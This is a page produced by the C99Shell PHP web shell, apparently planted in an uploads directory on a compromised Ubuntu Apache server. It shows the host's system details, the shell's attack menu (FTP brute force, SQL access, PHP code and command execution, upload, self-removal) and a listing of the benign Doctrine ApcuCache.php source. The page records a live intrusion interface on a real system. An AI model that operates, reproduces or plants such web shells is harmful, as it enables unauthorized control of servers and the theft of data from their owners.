!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/doctrine/cache/lib/Doctrine/Common/Cache/   drwxr-xr-x
Free 13.18 GB of 57.97 GB (22.74%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ApcuCache.php (2.22 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Doctrine\Common\Cache;

use function 
apcu_cache_info;
use function 
apcu_clear_cache;
use function 
apcu_delete;
use function 
apcu_exists;
use function 
apcu_fetch;
use function 
apcu_sma_info;
use function 
apcu_store;
use function 
count;

/**
 * APCu cache provider.
 *
 * @deprecated Deprecated without replacement in doctrine/cache 1.11. This class will be dropped in 2.0
 *
 * @link   www.doctrine-project.org
 */
class ApcuCache extends CacheProvider
{
    
/**
     * {@inheritdoc}
     */
    
protected function doFetch($id)
    {
        return 
apcu_fetch($id);
    }

    
/**
     * {@inheritdoc}
     */
    
protected function doContains($id)
    {
        return 
apcu_exists($id);
    }

    
/**
     * {@inheritdoc}
     */
    
protected function doSave($id$data$lifeTime 0)
    {
        return 
apcu_store($id$data$lifeTime);
    }

    
/**
     * {@inheritdoc}
     */
    
protected function doDelete($id)
    {
        
// apcu_delete returns false if the id does not exist
        
return apcu_delete($id) || ! apcu_exists($id);
    }

    
/**
     * {@inheritdoc}
     */
    
protected function doDeleteMultiple(array $keys)
    {
        
$result apcu_delete($keys);

        return 
$result !== false && count($result) !== count($keys);
    }

    
/**
     * {@inheritdoc}
     */
    
protected function doFlush()
    {
        return 
apcu_clear_cache();
    }

    
/**
     * {@inheritdoc}
     */
    
protected function doFetchMultiple(array $keys)
    {
        return 
apcu_fetch($keys) ?: [];
    }

    
/**
     * {@inheritdoc}
     */
    
protected function doSaveMultiple(array $keysAndValues$lifetime 0)
    {
        
$result apcu_store($keysAndValuesnull$lifetime);

        return empty(
$result);
    }

    
/**
     * {@inheritdoc}
     */
    
protected function doGetStats()
    {
        
$info apcu_cache_info(true);
        
$sma  apcu_sma_info();

        return [
            
Cache::STATS_HITS             => $info['num_hits'],
            
Cache::STATS_MISSES           => $info['num_misses'],
            
Cache::STATS_UPTIME           => $info['start_time'],
            
Cache::STATS_MEMORY_USAGE     => $info['mem_size'],
            
Cache::STATS_MEMORY_AVAILABLE => $sma['avail_mem'],
        ];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0051 ]--